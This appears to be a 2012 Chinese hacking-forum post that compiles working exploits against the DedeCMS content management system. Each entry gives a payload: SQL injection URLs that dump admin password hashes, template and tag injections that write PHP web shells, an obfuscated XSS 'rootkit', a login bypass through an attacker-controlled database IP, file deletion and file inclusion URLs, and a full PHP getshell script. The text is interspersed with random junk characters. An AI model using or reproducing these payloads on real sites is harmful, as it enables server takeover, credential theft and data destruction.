找回密码
 立即注册
查看: 3869|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
: U# d& o, g, F7 m: ]# N( g" h/ e: F
Dedecms 5.6 rss注入漏洞) l- a* {8 d3 i( Z: c
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1% T" R7 O. x3 A5 {
% J- T( A% x0 q
% i8 {3 T* y' Z+ r4 k7 {% ^
* k. d/ w) c* t& @1 V, N. c, ]

. \2 u: L1 w4 y4 T; ^: k6 d+ [: T! }6 g5 _! H

1 v9 k6 G1 a. J
: D; r3 o" G" @1 p2 T
5 T0 `' q9 o  k- n7 }( `9 eDedeCms v5.6 嵌入恶意代码执行漏洞! U# l+ Z+ X% T" t: f
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
( V3 M/ s- m2 ?4 x4 D9 o发表后查看或修改即可执行
1 i; Z2 o! \# k1 |0 ja{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
( v: n2 c8 U3 i, m7 B9 C生成x.php 密码xiao,直接生成一句话。
8 A  V, f9 s8 R+ D7 [4 D+ N. E2 {; V" I. E
1 q  k2 h2 M9 O' f& i" f/ U! ^
2 K8 z7 j/ K; d- Y' u0 p
4 K  G% k' j1 y2 j& d3 A! g; |

4 t# N& Y- x6 r$ }9 X. I% y
; `0 l8 f2 D! G. L8 |$ O  h9 O1 ^
; p2 Z6 i% s7 h# y# R3 U$ @
2 H8 K: g, s% M+ S4 LDede 5.6 GBK SQL注入漏洞
4 G8 c' l4 n, v3 \2 R+ K& N  a$ R( ?' u
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
7 c9 |% g/ N- c' _: W9 p
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe  Z8 |; X, G) C' E
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
, B! ?/ g1 ~. u$ W
. p- u* I5 J2 P/ j' ?
# P% N) [  |9 T( h! c& M9 }; f& t; w; }# D
& _3 v+ C2 o. `; t5 D

) b6 k0 P9 L8 U  ]' T$ q
  F, T; z, h( p6 U9 c+ V0 J: `% k1 Q7 o$ v/ A. ^1 b

8 `9 P; _, |0 Z" x8 P2 }DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞1 [: U8 v% W3 h& A  O+ q5 D# a
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
" k6 l$ e) U2 k$ m
$ k- V, J' t3 s+ ^. o5 n( q& Z. m* }2 n2 o$ l+ A6 c8 |

: J& s( K6 r$ Z6 v# M9 f; a# b0 ]- I7 ?1 u/ {% q

! J) ?8 T3 Q4 A  K/ z
, Q( C" m# c! h1 \DEDECMS 全版本 gotopage变量XSS漏洞; z  E2 H; k" ?5 Q# W  U* _% R" @9 A
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 0 Q2 m5 u; m8 w- ^4 O
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
+ {: T7 ?% @# h9 {% z" f6 d+ @) l9 v( g8 R

# c8 ~/ C& \  j+ h7 }, {* T5 k3 q2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。   y/ g% s( ~0 i0 J6 m" M
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
) z! Y, r+ x8 w  {& O
1 j% @) t& V1 N9 B& P/ e
9 w- c  o1 I" C* n  Y. Yhttp://v57.demo.dedecms.com/dede/login.php
9 t6 Y# x2 X4 M( ]. h" s% i: Q# P

  v# B. p7 M- e. u  {color=Red]DeDeCMS(织梦)变量覆盖getshell+ m; m0 g5 `" L$ ?. J3 p
#!usr/bin/php -w7 g) ]( F2 S, J/ w. Q. v# t
<?php/ B/ t/ o8 T7 p5 Y
error_reporting(E_ERROR);! C+ B6 J$ a; @& J
set_time_limit(0);. V; i3 {4 ?+ f1 X" j
print_r('
# F' h' }' x9 r1 VDEDEcms Variable Coverage
5 O- w: `6 u7 r$ Q* TExploit Author:
www.heixiaozi.comwww.webvul.com
: [. H% ^$ i  }) H; o. I6 _, ^);
9 l6 d) m/ U0 f$ R0 [echo "\r\n";: w# C. F# J5 k+ c4 M" z9 s) J
if($argv[2]==null){' V( J( r& H! O0 ], ]" B6 u. G0 u
print_r('
/ O6 v9 N$ j+ l- A. I. l. a+---------------------------------------------------------------------------+
$ }: x+ J9 O) o' g5 S$ YUsage: php '.$argv[0].' url aid path
5 v: j" r" c/ q$ U5 Q7 faid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
: C0 I* W* {3 ZExample:
, x9 m$ a. B) J" T$ Y% _; G1 a7 gphp '.$argv[0].'
www.site.com 1 old/ O, d' [  R2 u3 }% c. x
+---------------------------------------------------------------------------+
' O! Q* L0 ^: f) i& w4 S');9 g; T8 ], d: z: N7 s8 P
exit;
- N+ k9 J( y/ k( Y* \6 K; t}8 H8 W( g$ F( F3 e( q2 v
$url=$argv[1];
0 X+ d! t+ c7 E$aid=$argv[2];  n) X/ M* o" e+ i. o
$path=$argv[3];6 e7 @7 ?5 o1 _( y
$exp=Getshell($url,$aid,$path);% I; i, ?! @: L/ }! G# [+ Q( w
if (strpos($exp,"OK")>12){
+ F& L% G7 T8 d' P1 d$ |! |- R( _echo "
6 ~9 `/ g' k! BExploit Success \n";
2 x6 U& K1 y: T0 _3 O% ?if($aid==1)echo "$ R1 m5 p! ]. Q. S1 n
Shell:".$url."/$path/data/cache/fuck.php\n" ;& s8 b8 z8 d& `2 W
7 V: P, Q3 ^5 @

& E* B7 o4 y% ?4 Z3 q) ^if($aid==2)echo "
1 R/ s; v" H* L; j4 D* tShell:".$url."/$path/fuck.php\n" ;1 ?  h6 l; c2 N+ q

- s) Z" |: Y* |8 o
$ i$ F) V1 }6 S+ j7 W9 v- T7 Qif($aid==3)echo "8 D* V1 g, P) k6 e  g4 M& t
Shell:".$url."/$path/plus/fuck.php\n";
9 Q+ L- x8 S6 f
! `0 v6 P: A- q6 |, y4 B3 {$ Q" S4 S: i7 ?7 O8 |
}else{4 W6 a' I! G$ L* D+ X  |5 A6 f: M1 x
echo "
1 k- v# n7 ?3 e  H2 u2 HExploit Failed \n";/ D( Q5 ^* @2 f6 ]
}5 J6 e) ], }  i7 o2 {3 S# m
function Getshell($url,$aid,$path){3 @. J, n8 R5 D& I  U1 o. ^8 D0 l
$id=$aid;  d% a' {8 N' k" \) j4 z9 @" \
$host=$url;
, r' q7 [' d, h( a! k$port="80";
' v9 c2 H7 a. |2 i, I2 M7 R% B$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";! G4 f  ~0 [& @/ l" F
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";: B7 m$ k' k, x  Y
$data .= "Host: ".$host."\r\n";+ _0 i4 [) K% b; v( q$ J
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
4 U' V$ w! c, ]9 [/ M: |- f$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";% r( v9 K2 w! d* S6 W; {
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";' e1 H3 F( M, }4 J+ M+ I
//$data .= "Accept-Encoding: gzip,deflate\r\n";5 o4 b2 n5 k6 B+ a- p
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";, X- U9 e5 J1 G. U' \- e
$data .= "Connection: keep-alive\r\n";6 z; V" V* [* \  [# P6 n
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";* W8 \0 P$ a* a' d4 F
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";8 @  ?  i* P3 x( b
$data .= $content."\r\n";
: c  v& ~2 l/ t+ U) G( z4 F  U  p7 S2 e$ock=fsockopen($host,$port);
! a+ F$ @" ]8 e% K( @if (!$ock) {5 I0 V* A  a- E, h3 Z, D  X1 T
echo "4 S8 K  R! s. B; ~  N* D% I  E, n
No response from ".$host."\n";) c6 Y" y- |4 }/ A4 b/ c( S
}9 k' S: w1 H% E; d: u) f
fwrite($ock,$data);
4 {6 O3 Y! W; {8 H5 a2 |) ~. \* Q' uwhile (!feof($ock)) {6 @0 M/ Z6 O; k
$exp=fgets($ock, 1024);
- ]% D; t1 a0 Q  Y* q, p; Greturn $exp;2 H1 {/ a* B; F' D+ h3 V
}
+ C: Y, \$ r4 ?1 g1 P}
8 i3 G* a) Q7 \$ O; S& j  z# y/ M9 g$ Q% b; c+ @2 z

9 W  m  {* O& Y6 x' [! s?>1 O$ |) m, {! ?! h- t% g& t3 s
& X( B+ J: T8 d  {: @: X+ ^
4 E+ Q% {- y' }3 g$ h

" }5 {) h# k& @7 Q5 f5 X* l! d$ g3 M- r

! d+ a4 g  `6 {$ C% h6 M& v5 n( R- Z4 R$ l0 I" T
) I$ E$ H' D( B: F  D% V
3 a2 X8 P' C- w4 H' S* i: o$ {9 o

+ T0 @  {: X5 A" ^( ]
$ m' n6 Q6 [0 r) Y% LDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)* I9 K9 W; `& b! I" u
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root# V: d+ \" J  B$ B! j2 v) M: B
" d/ L1 k. w9 s  I2 m  p& L

8 _! n+ x/ V. N! C' @  a4 g把上面validate=dcug改为当前的验证码,即可直接进入网站后台
. {( t1 c7 O% p- ^8 {: l6 K/ y8 K! \# X# w& L9 Q  T  c

" Z* @6 g+ q, h此漏洞的前提是必须得到后台路径才能实现
: c" @" x5 P! m* e/ Q; J: G. a! T/ X; |
' n4 n- l/ o  F6 A

) o" Q& M3 Y+ C6 H8 Q4 H- B9 G( W3 c( z- ?$ @4 J6 q
5 r; h1 ?% B. H$ ^
' ?0 y' k" D: e
" N2 f- B; ~/ v- L

9 j; F9 E6 c" _/ J! b% h
9 V2 x5 M7 a2 ?6 y- S+ b5 a' F8 v! r, }2 \
Dedecms织梦 标签远程文件写入漏洞
5 L! s" ?! Q) @# F' ~前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');9 j8 Z3 T  `8 {& K' J; U

! d( Y) y9 I; i5 n, \
) I3 r7 F% j: D1 J再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
" Y4 Z! g8 Z0 ]) c<form action="" method="post" name="QuickSearch" id="QuickSearch">
- {4 P: G) M8 s  w  o1 D, \<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
2 }# y" c/ c" [6 z: ^: m<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />$ C- h! Q+ t' g3 b* K  R( M: T# v
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
$ k; V) b$ a3 p<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
6 u# [1 c$ i& X+ ]0 D. C<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />9 d) h7 U3 Q, i: Q
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
- l/ W, {3 G1 f<input type="text" value="true" name="nocache" style="width:400">
. f! d/ U0 _  B<input type="submit" value="提交" name="QuickSearchBtn"><br />6 a0 }3 X  J: h8 H2 o7 A, r
</form># I( Q, i# D; ~
<script>
8 O3 ?8 T6 g9 g+ r+ S8 @function addaction()
# U7 }# F$ A1 t2 l{
# e* F5 R/ P% u1 ~9 _( }# y7 {document.QuickSearch.action=document.QuickSearch.doaction.value;) i2 D. I1 ~6 v4 F, y
}
2 u. z- {+ ~& D! ~3 p</script>
! C2 S" d, R+ O4 Q3 n
" ?5 o  {# I: c8 p0 N5 Y: M9 W/ K, }( r3 O; e: @5 O8 X
  c* o- d6 j- H$ p  d; ^

6 H! }: Z2 g+ p8 B+ m/ t' Q
. Y1 t3 P- Z0 ~/ A8 w' H9 y2 R6 K. P4 k, C& a/ Z
3 V2 ]9 A5 s& U; j: U
9 |  r3 b$ G3 D; b5 r, }. d: R
5 t( |3 ?/ \" w
$ }5 _9 s8 s* _8 a" Z( Z2 I4 K
DedeCms v5.6 嵌入恶意代码执行漏洞" _  W, I. t! G' |
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
/ y5 q9 ~/ n5 f$ g' Sa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}- W" C! a% S; [4 o  n6 d. o
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
* ^0 ?6 q6 H% m9 tDedecms <= V5.6 Final模板执行漏洞* T$ _& v8 j4 Y! G' W4 Y
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:' P; y4 E; P4 r' U# _
uploads/userup/2/12OMX04-15A.jpg
! o! w0 V, o5 d' G# ^2 S. N4 b! N

  \5 U$ E6 X2 q# z5 K( u* |模板内容是(如果限制图片格式,加gif89a):3 h# U# l% L1 }; e8 o
{dede:name runphp='yes'}$ m( |8 X- S. c# h6 M' R, x+ G7 ~
$fp = @fopen("1.php", 'a');- g, n7 Q# B7 \: _6 [) {
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
8 m: i7 r3 ]9 E8 x0 _, w, A@fclose($fp);8 n3 L& m$ S) v3 m$ |
{/dede:name}
# n  R0 u* S# O# e. Y, I2 修改刚刚发表的文章,查看源文件,构造一个表单:
! L% O' g2 k" N$ B; a" o<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data"># T) U$ q% _, ^( c% W
<input type="hidden" name="dopost" value="save" />* L" f4 q+ j4 R2 h
<input type="hidden" name="aid" value="2" />( e0 U6 t# ~9 M9 L- t2 X
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
# E* e) x  g/ `7 B) c<input type="hidden" name="channelid" value="1" />
  r7 t% x! h* z% {6 N; ^6 l, [<input type="hidden" name="oldlitpic" value="" />
) S2 k8 r! {  g8 E( c<input type="hidden" name="sortrank" value="1275972263" />" P7 n0 ?8 U/ [) A7 R0 Y
! k3 e  B9 n8 ?- ?) N# d! ~9 f
! k+ P# V( V" \* o
<div id="mainCp">
; _# x  [' v" A; ^# K1 i& c% ^& e<h3 class="meTitle"><strong>修改文章</strong></h3>4 j2 z9 i( W- O; G3 ~) U3 w

2 I( j# B6 n- e, _1 R+ G: x3 B! M0 H$ P
<div class="postForm">
7 i/ W7 {1 w* I6 l<label>标题:</label>
( N. S7 z3 H9 ]<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>8 `& k: \; j2 C, g" t) u+ L/ m& ~

0 L5 v  R+ W. k) [6 z5 `  u! E: a
<label>标签TAG:</label>
) u8 ]& C5 o) a0 V9 o( m<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)! w, t1 w& D. S6 {2 S
' M+ e  z# F8 e" {) w7 P) }
. O6 I' c9 A1 d8 A* E
<label>作者:</label>
" z4 G9 g4 W, V+ T3 }- L<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>1 n/ p3 ?+ S% i
* [  V4 z% |7 }" V0 d( v
6 B: p; l4 U* m. v/ c: J
<label>隶属栏目:</label>7 W! H) u5 U7 k0 E$ `. D
<select name='typeid' size='1'>
9 L' i0 k+ I5 D& \8 a" W+ M3 n<option value='1' class='option3' selected=''>测试栏目</option>
2 @3 G6 r8 C6 s3 k</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
9 F4 R) z4 U2 J3 U# ~7 \4 @/ l8 _" K+ g- Q2 W

( A1 g, m3 N2 f0 J. t2 b<label>我的分类:</label>
( |- |. o4 q* P1 U. s0 d<select name='mtypesid' size='1'>+ |$ v( W& K- l6 C
<option value='0' selected>请选择分类...</option>/ i3 h! S* |1 {* x
<option value='1' class='option3' selected>hahahha</option>& _4 M( P. }4 I; B4 O
</select>, Z* m. A- o+ R) R9 k
( @3 A* R  `; L/ p2 t+ J! ]

9 S1 M: B2 K8 N' ?<label>信息摘要:</label>1 R" F6 X& k  `$ |1 v7 a4 s/ x' N
<textarea name="description" id="description">1111111</textarea>* I8 f/ ]* h6 t- v5 O
(内容的简要说明)7 J1 C: \8 p5 s, X! i$ d

1 g5 B9 b% Z; G" ~( _/ k2 u4 l
1 s0 r% \: R. r8 x9 K<label>缩略图:</label>
: S# c9 n  d+ w7 w5 H% y<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
# j( V. o) _7 i" g* ?, C$ F6 E/ E0 m1 J  g8 J2 `2 b( V2 t

( E: r( @4 P0 S, q- @7 C. [! L9 [<input type='text' name='templet'
6 u# s; C2 n2 h4 {; M/ M' u5 n9 hvalue="../ uploads/userup/2/12OMX04-15A.jpg">
% [2 ], ^9 i* Z5 y2 S<input type='text' name='dede_addonfields'
+ {" _6 f. b: E( q8 Dvalue="templet,htmltext;">(这里构造)7 i0 `/ N% ~( c# y$ L- T) m, k
</div>( T5 f* w2 j! j& a# ?# ~
- l/ Q8 v0 n5 c# x% o0 M+ B- Z; f
. J8 n* x9 h# _" C$ ~) k. [# h% z
<!-- 表单操作区域 -->
/ d5 A& U) ^* Y* N$ [$ ~<h3 class="meTitle">详细内容</h3>0 L& p/ E/ q1 r' d0 H
; V: _- c) }7 s! m! ?+ ?4 _
2 t; W9 I: {, K( Q/ f" x8 o' B" ]
<div class="contentShow postForm">$ x6 m! w+ C4 M/ D$ e" v/ }9 S
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>: y' @4 W# d" P1 Y: d/ V* x
8 C7 H. u2 Q8 x. X0 G

$ |: z- ]+ s2 K7 q. o+ J7 C& c' }<label>验证码:</label>
& u& z! N/ u/ [: o6 v<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />  c) c% h: b4 }* W& q9 n
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
/ B2 M8 b7 e" k% ^* w& M/ }( |5 P

& X! \# c: O6 U/ \  ]  a3 {- R<button class="button2" type="submit">提交</button>/ ^& {1 d5 b! i! P
<button class="button2 ml10" type="reset">重置</button>; G" |2 q7 {/ Z/ D* w1 P
</div>( z- f5 K5 ^1 |+ e1 X& _8 [

! E; r7 }& E; [7 h) \% n( |) L
! T. _# _9 D8 k+ S1 Q$ G</div>
9 Q- ?5 z$ b1 z6 W
% }7 K# u8 b1 p8 I" d6 X2 A  z0 X
8 |- p9 t- K" o: d% N  g</form>
. _/ E6 l9 P' d. J8 z1 j( H: H
. C' p3 y5 ^1 `! x3 V6 n9 j' G" D8 Y' I, ?* a9 N& E
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
2 ^, j% x6 \# z: Z0 K- U假设刚刚修改的文章的aid为2,则我们只需要访问:6 A& v* R; n, k  v, i5 n4 f+ @
http://127.0.0.1/dede/plus/view.php?aid=2( _: W& H+ k7 y
即可以在plus目录下生成webshell:1.php
1 k; f' U8 T* ?8 i
" M& {! w: C- v6 r
& v* K+ h) t0 x: U9 A& R9 @1 {' z
( r; T0 |. ~6 Y) v( L: L; x" @
  L& Y- j) ?- H$ W
/ B$ V9 L1 ]" A: j  D; V$ V4 W- E% A. ]

' \  T; a! R2 V) `! s
: r4 I/ U+ z- Y. e( q, Y
6 ]  U% T7 N+ ^8 c: Y
6 O9 I. W$ I  u5 n( y# T7 m6 p( ~' u& A% J3 w! A* }

4 l8 E! Z' n$ _9 D9 p7 R  s% q/ q, fDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
8 x+ X  F- `9 ^Gif89a{dede:field name='toby57' runphp='yes'}# [0 Z3 l: \- r
phpinfo();
! f* b& T; q+ h5 r2 A{/dede:field}" q' t3 C( G, P( _7 C2 v* z
保存为1.gif
% {& L1 x: D$ U/ V8 x2 N+ E<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> - L/ c0 W# z' \' E. _
<input type="hidden" name="aid" value="7" />
/ c; ?2 K/ f9 d9 H2 _! I, [<input type="hidden" name="mediatype" value="1" /> 2 K8 Z+ N4 V# V
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
) N: i( d" k* L3 i) B' q<input type="hidden" name="dopost" value="save" />   _) k. R: o8 q+ p7 ]/ s  ?( `" V
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
' g" x# g+ p# n. i+ k# E& X" W<input name="addonfile" type="file" id="addonfile"/> % o8 d6 @/ w; O
<button class="button2" type="submit" >更改</button>
1 l8 R* Q: G: x: f) Y8 |</form>
' F$ Y0 s" p6 j+ j/ @# }) l4 {* i
9 w2 B7 R& N5 n: i% a; b
9 K8 l/ M9 P! S$ K  X  J# |构造如上表单,上传后图片保存为/uploads/userup/3/1.gif  G6 d/ e/ \1 @3 j' j2 l, D6 Q
发表文章,然后构造修改表单如下:
5 D. J5 a2 @/ s5 K+ Z* a
" R2 @- v( H( W% A" N6 j9 S  I0 O- `
6 l1 S/ e% h4 A% ^0 W0 b$ G9 R<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
/ O' Q" m7 P1 s<input type="hidden" name="dopost" value="save" /> & W  a6 l6 n8 W& n* y! t
<input type="hidden" name="aid" value="2" />
: V% [; G1 _6 C5 m3 C<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
! \5 M4 E8 w1 U<input type="hidden" name="channelid" value="1" />
4 w- V* k+ y2 q7 X; K' v' v2 F<input type="hidden" name="oldlitpic" value="" /> # }: x4 I) Y0 Y( T$ j& a' e
<input type="hidden" name="sortrank" value="1282049150" /> + y& e) O3 i4 U4 O$ T2 F
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
% i9 g+ w; G, R- ^; Z. O<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
( D* R9 o/ [- ?% E: \6 W! o4 [<select name='typeid' size='1'>
. G2 b$ W. Z& J. I, j<option value='1' class='option3' selected=''>Test</option> 4 p& a- v! q) W! d
<select name='mtypesid' size='1'>
( f$ B- n, o( R- _- C: B+ ]" K<option value='0' selected>请选择分类...</option> ' o3 b9 B! p) p7 a% b/ a" Y2 o
<option value='1' class='option3' selected>aa</option></select> + n  K9 k% y. |
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 0 b/ [0 k$ T- A$ p' A
<input type='hidden' name='dede_addonfields' value="templet">
# S& U% `0 ?3 z<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
8 _. r8 q$ d) \- Y% ?1 D" z. v# h( k- j<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
9 _! N( i+ b0 O. t1 U3 @( L( w<button class="button2" type="submit">提交</button>
+ ]! z( J" o2 z2 W  Y</form>& e: A3 t$ O8 ?
; q0 d& s# J9 }
+ m5 J1 l3 [* ^& d

! l7 A) l2 U2 {# h! x% `+ t, b' t+ U' `# ~

' ~' e% I* ^, m7 V2 N% @) f  }: i4 E9 q
- @6 S, e! E* \+ M+ i

1 V# P4 J1 H/ y- P% w2 t+ _4 w  t4 c5 ^2 V% B9 d

8 B+ f4 r3 W( }6 w/ m( f0 X% q5 H/ f' c# t; J$ O% N; Q

0 v* u% A4 b. Q3 M织梦(Dedecms)V5.6 远程文件删除漏洞4 ?+ H' D; b+ F2 }
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
- ~$ ^  M" U2 J/ B
+ S" Y) I6 o9 K9 f" [9 V, z
  Q& E% V5 B) H  t; q" W) z& G: Y1 A
7 M' `( H- Y6 n
6 z" B* L8 z, Z# y7 v) O
7 X* o; R( _& u/ f" M* Y  V
! e9 T8 l* t  ^7 y( i6 I8 c
8 W" J) ?: R  V; B" S& e! {
  `6 K0 y8 ?+ [" ]" K9 D& E. r- c3 y9 L
! }$ |1 h7 A/ T! o
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 - Z6 o4 o, H+ A( _$ ?: E, V/ N
http://www.test.com/plus/carbuya ... urn&code=../../
& Z  v. D/ \6 ^/ E
2 Z, A* G2 b$ f9 e
3 T+ Y8 D+ {* O, u1 X: q0 o
/ }# M; z9 K1 e7 j$ _  {% O
  L4 ]5 [# G2 R3 N1 \& b6 ?" Z1 [; a! O# _  f! O
6 {; E& K" _  V' q! H* Q5 L% A# L' o

* O2 j4 X8 t, s; C& a: _+ c, ?3 X# E2 A* {  m) o. V" I5 E; a9 {! A

+ U" K: K7 k+ T$ l% \" a
( W  S' C  Y; K  M6 C& l* MDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 . B. `: K6 K4 |% x- F
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
$ s; G* f1 ^9 ^! K/ _$ E/ A密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD56 l, P# Z0 X5 O% p

- P" H; u2 a/ A) p$ y  Q- a" G& }2 z& T

) W. @8 x; j7 ^8 W: O" h
1 W) K+ s/ W$ q, f7 h- A/ X6 A1 z+ _/ f& L$ g- {. x2 o

4 V; e6 w, J6 q- b/ b% y
! P: f- a/ D8 y" f+ K# j
5 E! M3 `) u( R: z, V% w# i5 @
1 Y7 k$ {% o% `0 \
/ p& u$ b, E, F. p织梦(Dedecms) 5.1 feedback_js.php 注入漏洞" f. n$ o1 A+ c! k/ i8 V
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
: f- L! N# J$ t; x5 o0 P
4 l% L9 _1 n" k7 s7 }
